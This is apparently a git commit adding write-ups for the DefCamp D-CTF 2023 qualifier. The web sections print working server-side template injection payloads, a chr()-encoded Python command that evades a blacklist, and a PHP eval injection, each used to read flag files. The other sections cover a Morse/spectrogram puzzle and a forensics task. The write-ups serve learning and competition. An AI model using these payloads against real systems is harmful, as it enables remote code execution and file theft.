feat: added dctf quals 2023

DefCamp Capture the Flag (D-CTF) 2023 Quals/README.md

@@ -0,0 +1,11 @@
+# DefCamp Capture the Flag (D-CTF) 2023 Quals
+CTF writeup for The DefCamp Capture the Flag (D-CTF) 2023 Quals. I took part in this CTF competition with the HCS team and secured the 26th place out of 610 teams
+
+| Category | Challenge |
+| --- | --- |
+| Web | [forty-nine](/DefCamp%20Capture%20the%20Flag%20(D-CTF)%202023%20Quals/who-done-it)
+| Web | [code-transpiler](/DefCamp%20Capture%20the%20Flag%20(D-CTF)%202023%20Quals/code-transpiler)
+| Web | [boze](/DefCamp%20Capture%20the%20Flag%20(D-CTF)%202023%20Quals/boze)
+| Web | [nsort](/DefCamp%20Capture%20the%20Flag%20(D-CTF)%202023%20Quals/nsort)
+| Steganography\|Cryptography | [morse-music](/DefCamp%20Capture%20the%20Flag%20(D-CTF)%202023%20Quals/morse-music)
+| Misc | [who-done-it](/DefCamp%20Capture%20the%20Flag%20(D-CTF)%202023%20Quals/who-done-it)

DefCamp Capture the Flag (D-CTF) 2023 Quals/boze/README.md

@@ -0,0 +1,30 @@
+# boze
+> How smart and capable is the smarty lib?
+
+## About the Challenge
+We were given a website that using smarty template to render our input, here is the preview of the source code
+
+![source code](images/source_code.png)
+
+It first checks if a `content` parameter is set in the GET request. If not, it displays the source code of the script. If the `content` parameter is set, it creates a new Smarty object and tries to display the content specified in the `content` parameter. If an exception occurs, it echoes `Still here?` and logs the exception details to a file. The source code is vulnerable to SSTI. We need to input the payload in the `content` parameter and then check the log file to see the output.
+
+## How to Solve?
+At first I tried to input every payload which is on `Hacktricks`, but I failed -_- 
+
+![meme](images/meme.png)
+
+And then I tried to read the smarty documentation and I found the `fetch` class method. This function is used to retrieve a resource from a URL. And I inputted in the `content` parameter
+
+```
+{fetch file='flag.php'}
+```
+
+![fetch](images/fetch.png)
+
+And then check `/tmp/smarty_exception.log` file to obtain the flag
+
+![flag](images/flag.png)
+
+```
+ctf{72874605748965cbd4350a538e09abbfb20fbc47a8443addcd5c4adfd57dca79}
+```

DefCamp Capture the Flag (D-CTF) 2023 Quals/code-transpiler/README.md

@@ -0,0 +1,30 @@
+# code-transpiler
+> Bypass the security restriction and get th flag.
+
+## About the Challenge
+We were given a website where we can execute a python command like this
+
+![preview](images/preview.png)
+
+And there are also some limitation (For example, we can’t input `__`)
+
+![blacklist](images/blacklist.png)
+
+## How to Solve?
+In this case, we use the `exec()` function, and then I need to change each character to ASCII code and then use the `chr()` function. The command below is used to read the flag
+
+```
+__import__("os").system("cat flag") 
+```
+
+And then, the final payload will be like this
+
+```
+exec(chr(95)+chr(95)+chr(105)+chr(109)+chr(112)+chr(111)+chr(114)+chr(116)+chr(95)+chr(95)+chr(40)+chr(34)+chr(111)+chr(115)+chr(34)+chr(41)+chr(46)+chr(115)+chr(121)+chr(115)+chr(116)+chr(101)+chr(109)+chr(40)+chr(34)+chr(99)+chr(97)+chr(116)+chr(32)+chr(102)+chr(108)+chr(97)+chr(103)+chr(34)+chr(41))
+```
+
+![flag](images/flag.png)
+
+```
+CTF{4e08cd8cc051a304f94dd905b66af29572e3aa8fa56d93200bfd34727e2a892a}
+```

DefCamp Capture the Flag (D-CTF) 2023 Quals/forty-nine/README.md

@@ -0,0 +1,26 @@
+# forty-nine
+> We have a random fact generator that might have some problems sanitizing the input. It may not be as simple as 7*7.
+
+## About the Challenge
+We were given a website, and there’s only 1 form input in the website
+
+![preview](images/preview.png)
+
+## How to Solve?
+And then I tried to input `${{7*7}}` and the output was `Sorry, I do not understand Attack detected!.`. And after analyzing a little bit, sadly we can’t input `{{`
+
+Well, even though we can’t input `{{`, we still can bypass it using `{%`.
+
+![meme](images/meme.png)
+
+And to obtain the flag, we need to execute an OS command by importing the `os` module and then calling the `popen` function and then executing the `cat flag.txt` command.
+
+```
+{% print(x.__init__.__globals__.__builtins__.__import__("os")["popen"]("cat flag.txt").read()) %}
+```
+
+![flag](images/flag.png)
+
+```
+CTF{f1cb7344129bcc51480407f1f381cb994c155194fdde34b827cc48c9f4d3040e}
+```

DefCamp Capture the Flag (D-CTF) 2023 Quals/morse-music/README.md

@@ -0,0 +1,30 @@
+# morse-music
+> You might need to cross listen the message within the morse code.
+
+## About the Challenge
+We were given a wav file (You can download the file [here](final_sound91976.wav)), and we need to find the flag inside the file
+
+## How to Solve?
+If we decode the morse code, we got this message
+
+```
+Did you know that this is not about the morse code? It is about the spectogram only that the password is UHR3V8203RJD
+```
+
+And if we check the spectogram of the file, there is a QR code
+
+![qr](images/qr.png)
+
+Parse the QR code and we got this string
+
+```
+Njw0SGcLVwJVZ358MC0xBmUMClMKanlzZSpnAjVeBgVRMX0lYyliA2RaB1UDY3ghMHw0UGUPAQAHNysnNClmAjMPA1VO
+```
+
+Decode it using base64 encoding and then XOR the result with `UHR3V8203RJD` to obtain the flag
+
+![flag](images/flag.png)
+
+```
+ctf{13e2f548eec5348c98370b51cf45bc7a6a002b5e012ee4fc37304eacaa41e71e}
+```

DefCamp Capture the Flag (D-CTF) 2023 Quals/nsort/README.md

@@ -0,0 +1,40 @@
+# nsort
+> Can you escape the sandbox? Do you have all the needed info?
+
+## About the Challenge
+We were given a static website (There are no images, no forms, only texts)
+
+```
+🚩 Whoops! Looks like the proof-of-concept (poc) is missing! 🔍🧐 Don't worry, it's waiting for you in flag.php! Happy coding! 🤓💻 #MissingPOC #FlagHunt #PHPDev #missingpocinget
+```
+
+## How to Solve?
+If we read the text again, it looks like we need to add `?poc` parameter in the URL and voilà! We got an error output
+
+![poc](images/poc.png)
+
+Hmm, our input goes into the `eval` function where we have to do Remote Code Execution (RCE). If we read the title again, it looks like the author using `sort` function inside the eval
+
+After finding some reference about the RCE inside `sort` function, I got some useful information on Hacktricks (Thank you carlospolop!)
+
+https://book.hacktricks.xyz/network-services-pentesting/pentesting-web/php-tricks-esp#rce-via-usort
+
+And then we need to close some bracket and then running phpinfo function using this payload
+
+```
+);}}phpinfo();//
+```
+
+![phpinfo](images/phpinfo.png)
+
+Yay we can execute PHP commands, but when I checked disable_functions information, almost all PHP functions which are to run OS commands cannot be used.
+
+![disable_functions](images/disable_functions.png)
+
+To obtain the flag I used a `file()` function to read `flag.php` file 
+
+![flag](images/flag.png)
+
+```
+CTF{38754723ac2ce496f98359fc7f0acdea211269d812a3f4d30e779bc2aae6565f}
+```

DefCamp Capture the Flag (D-CTF) 2023 Quals/who-done-it/README.md

@@ -0,0 +1,32 @@
+# who-done-it
+> We might have an insider threat in our company. Help us to clarify this unconfortable situation.
+
+## About the Challenge
+We got a zip file called `who-was-it.zip` and the file contains some useful information about the victim pc such as PowerShell History / Device Information
+
+## How to Solve?
+There are 3 questions that we need to answer:
+
+1. Identify the hostname of the compromised machine.
+
+We can get the hostname information at `/SystemInfo/output.txt` file
+
+![Q1](images/q1.png)
+
+2. Provide the name of the malware binary downloaded by the attacker on the compromised account.
+
+If we check the PowerShell History command (Especially in `plant` user). In line 156-157, the attacker tried to download a file called `ZekaAPT28.bin`
+
+![Q2](images/q2.png)
+
+3. Which is the suspicious scheduled task created by the attacker on the system?
+
+We can get the suspicious scheduled task at /scheduled_task/Windows/System32/Tasks file
+
+![Q3](images/q3.png)
+
+```
+Q1: DESKTOP-V2VNNIV
+Q2: ZekaAPT28.bin
+Q3: connect_to_server
+```

README.md

@@ -110,6 +110,7 @@ List of CTF events that i have joined before
 | Winja CTF 2023 | Yes | [Link](/Winja%20CTF%202023/) |
 | Buckeye CTF 2023 | Yes | [Link](/Buckeye%20CTF%202023/) |
 | SunshineCTF 2023 | Yes | [Link](/SunshineCTF%202023/) |
+| DefCamp Capture the Flag (D-CTF) 2023 Quals | Yes | [Link](/DefCamp%20Capture%20the%20Flag%20(D-CTF)%202023%20Quals/) |
 
 ### Local Events
 | Event Name | Writeup Available? | Writeup Link |